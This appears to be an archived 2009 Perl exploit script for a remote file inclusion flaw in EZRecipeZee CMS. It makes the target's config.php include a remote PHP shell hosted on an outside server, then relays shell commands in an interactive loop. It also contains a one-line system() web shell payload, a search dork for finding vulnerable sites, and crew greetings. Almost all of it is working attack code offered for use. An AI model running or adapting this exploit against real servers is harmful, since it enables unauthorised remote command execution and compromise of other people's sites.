Home / os / win10

ezrecipezee-rfi.txt

Posted on 12 October 2009

#!/usr/bin/perl ##### # [+] Author : kaMtiEz (kamzcrew@gmail.com) # [+] Date : September 30, 2009 # [+] Homepage : http://www.indonesiancoder.com # [+] Vendor : http://www.jdtmmsm.com/ # [+] Download : http://www.jdtmmsm.com/downloads/index.php?setFilter=11232 # [+] version : v91 # [+] Method : Remote File Inclusion # [+] Dork : "Kill-9"+"IndonesianCoder" # [+] Location : INDONESIA # [~] Notes : # makasih buad babe and enyak ma ade .... muach .. # sayang jangan marah dong .. maaf kemarin bangun jam 8 malem .. :( # buat vycOd kuliah coy ojo fbnan wae ! wkwkwkwk # pagi jam 10 ditemani don tukulesto .. dan setelah mencoba akhirnya dapet vuln .. zzzzzzzzzzzzzzzzz # [~] Usage : # perl kaMz.pl <target> <weapon url> <cmd> # perl kaMz.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd # Weapon example: <?php system($_GET['cmd']); ?> ##### use HTTP::Request; use LWP::UserAgent; $Tux = $ARGV[0]; $Pathloader = $ARGV[1]; $oliv = $ARGV[2]; if($Tux!~/http:/// || $Pathloader!~/http:/// || !$oliv){usage()} head(); sub head() { print "[X]============================================================================[X] "; print " | EZRecipeZee CMS Remote File Inclusion | "; print "[X]============================================================================[X] "; } while() { print "[w00t] $"; while(<STDIN>) { $kamz=$_; chomp($kamz); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Tux.'config/config.php?cfg[prePath]='.$Pathloader.'?&'.$oliv.'='.$kamz)or die " Could Not connect "; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[ ]/[Í]/; if (!$kamz) {print " Please Enter a Command "; $return ="";} elsif ($return =~/failed to open stream: HTTP request denied!/ || $return =~/: Cannot execute a blank command in /) {print " Cann't Connect to cmd Host or Invalid Command ";exit} elsif ($return =~/^<br./>.<b>Fatal.error/) {print " Invalid Command or No Return "} if($return =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[Í]/[ ]/; print " $finreturn "; last; } else {print "[w00t] $";}}}last; sub usage() { head(); print " | Usage: perl kaMz.pl <target> <weapon url> <cmd> | "; print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ | "; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt | "; print " | <cmd> - Command variable used in php shell | "; print "[X]============================================================================[X] "; print " | IndonesianCoder Team | KILL-9 CREW | KIRIK CREW | AntiSecurity.org | "; print " | tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S | "; print " | Jack-, Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz | "; print " | Coracore, black666girl, NepT, ichal, tengik, och3_an3h, rendy and YOU!! | "; print "[X]============================================================================[X] "; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm | "; print "[X]============================================================================[X] "; exit(); }

 

TOP